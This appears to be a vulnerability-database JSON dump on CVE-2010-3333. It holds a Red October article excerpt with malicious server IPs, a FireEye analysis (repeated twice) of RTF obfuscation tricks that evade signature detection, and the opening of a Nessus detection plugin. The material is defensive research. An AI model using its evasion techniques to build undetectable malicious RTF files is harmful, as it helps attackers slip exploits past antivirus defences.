[his blog](<http://jeffreycarr.blogspot.it/2013/01/rbn-connection-to-kasperskys-red.html>)\n\n \n\n\nThe developers behind ROCRA, who are Russian, are comfortable using Chinese malware and adapting it for their own use according to the Kaspersky report. This fits the RBN profile to a \u2018t\u2019. I ran 13 IPs listed in Kaspersky\u2019s report against the [RBN list](<http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt>) maintained by James McQuade and found matching IP blocks for five of them:\n\n \n\n\n**Malicious servers**\n\n * 178.63.208.49 matches to 178.63.\n * 188.40.19.247 matches to 188.40.\n * 78.46.173.15 matches to 78.46.\n * 88.198.30.44 matches to 88.198.\n\n**Mini-motherships**\n\n * 91.226.31.40 matches to 91.226.\n\nIt has been my belief for many years that the RBN has a working relationship with the Russian government; that it disappeared from view when the FBI sought the assistance of the FSB to shut down their operations in 2007 (as detailed in chapter 8 of my book); and that it has continued operating below the radar all this time. It provides distance and deniability to the FSB for certain offensive cyber operations and, in exchange, the FSB allows the RBN to operate as a criminal enterprise; a portion of which involves selling the data that it steals to whomever is interested.Red October is already the most significant find of the new year. If, in fact, Kaspersky has uncovered an RBN-controlled espionage ring, it\u2019s going to be one of the most important discoveries of the decade.\n", "modified": "2013-10-14T11:49:51", "published": "2013-01-14T23:49:00", "id": "THN:B02C7C78600ED331232ABD4D1F8D2C4A", "href": "http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html", "type": "thn", "title": "Operation Red October : Cyber Espionage campaign against many Governments", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:50", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883", "CVE-2010-3333", "CVE-2012-4681"], "description": "None\n", "modified": "2013-12-13T14:02:26", "published": "2013-12-13T02:59:00", "id": "THN:3BF9400C51248462741DFA3EAF706DEE", "href": "https://thehackernews.com/2013/12/chinese-hackers-spied-on-european.html", "type": "thn", "title": "Chinese Hackers spied on European Diplomats during recent G20 meetings", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "modified": "2016-05-20T14:59:00", "published": "2016-05-20T14:59:00", "id": "FIREEYE:38120E3D3979DCD57297419690545DDD", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-17T14:44:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "modified": "2016-05-20T14:59:00", "published": "2016-05-20T14:59:00", "id": "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-09-14T16:11:01", "description": "The remote Mac OS X host is running a version of Microsoft Office that\nis affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Office file, these issues could be leveraged to\nexecute arbitrary code subject to the user's privileges.", "edition": 12, "published": "2010-11-09T00:00:00", "title": "MS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930) (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3336", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333"], "modified": "2010-11-09T00:00:00", "cpe": ["cpe:/a:microsoft:open_xml_file_format_converter:::mac", "cpe:/a:microsoft:office:2011::mac", "cpe:/a:microsoft:office:2008::mac"], "id": "MACOSX_MS_OFFICE_NOV2010.NASL", "href": "https://www.tenable.com/plugins/nessus/50531", "sourceData": "#TRUSTED 6fe6d9efe68623d935ecc4a7233b89f64cc311f5ad9a289450d519f04c6746333e83264e25e23dba892113fe1203dd73b684bc8b0368f3a09f36f53c9f1980b707bb35bf39cd930a42b782f1ad1e3d020547a8f9538a77e7df33ab8345643166cc78a022d119066c13d0c91cc0634d022829da7129bb963d6fe3b1e3f8cd3e50177c76ddc09fabd79d35d5104700010e40ce8c40f80fa167752673454544bd72d193b6b2daa32ce9658b80c61a74303657fc33605052ced2e07964bb4423126eea8d155ff25dde40a8daf04dca3d57d6beb7aade341495ac7341a92fe1e1586371b9828e2731f44a7e5e45ba6a6267a6299224f17e7abda039896a464a02f0ac2c0f36d3318923db23522147e8e977bde035becde0eac1a0b648cda7f047b0caeabde2d66edbcbb0c31501525028b952827f47e5dbeba2060e7b341bcc36ef1b7d4327db9fa9533507a52f072d36a0c6783424e694cc355e39663d20702a8562116e1de81d0e2144245250e0d87b02f759a00e576f4409605acdc9df056cc236a19459f5135836a21cd094c5f00af2c37dbd45a66b45d798354e1a6bf3b75d1377fccf09d2aaa2bd7459f6d54c48127dd49d0023571d7df589204826fea2dfe7446dff279d95ab169aad51b8d4c567bff8f8d4ec36e204e0d5e947f26ee6085b231c4d33d7b140f1d4fda20c76c0f570665f7e8733bb3c0c1ab93bd176680ee7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50531);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2010-3333\",\n \"CVE-2010-3334\",\n \"CVE-2010-3335\",\n \"CVE-2010-3336\"\n );\n script_bugtraq_id(44652, 44656, 44659, 44660);\n script_xref(name:\"MSFT\", value:\"MS10-087\");\n script_xref(name:\"MSKB\", value:\"2423930\");\n script_xref(name:\"MSKB\", value:\"2454823\");\n script_xref(name:\"MSKB\", value:\"2476511\");\n script_xref(name:\"MSKB\", value:\"2476512\");\n\n script_name(english:\"MS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930) (Mac OS X)\");\n script_summary(english:\"Check version of Microsoft Office\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote Mac OS X host is affected by\nmultiple remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host is running a version of Microsoft Office that\nis affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Office file, these issues could be leveraged to\nexecute arbitrary code subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms10-087\");\n 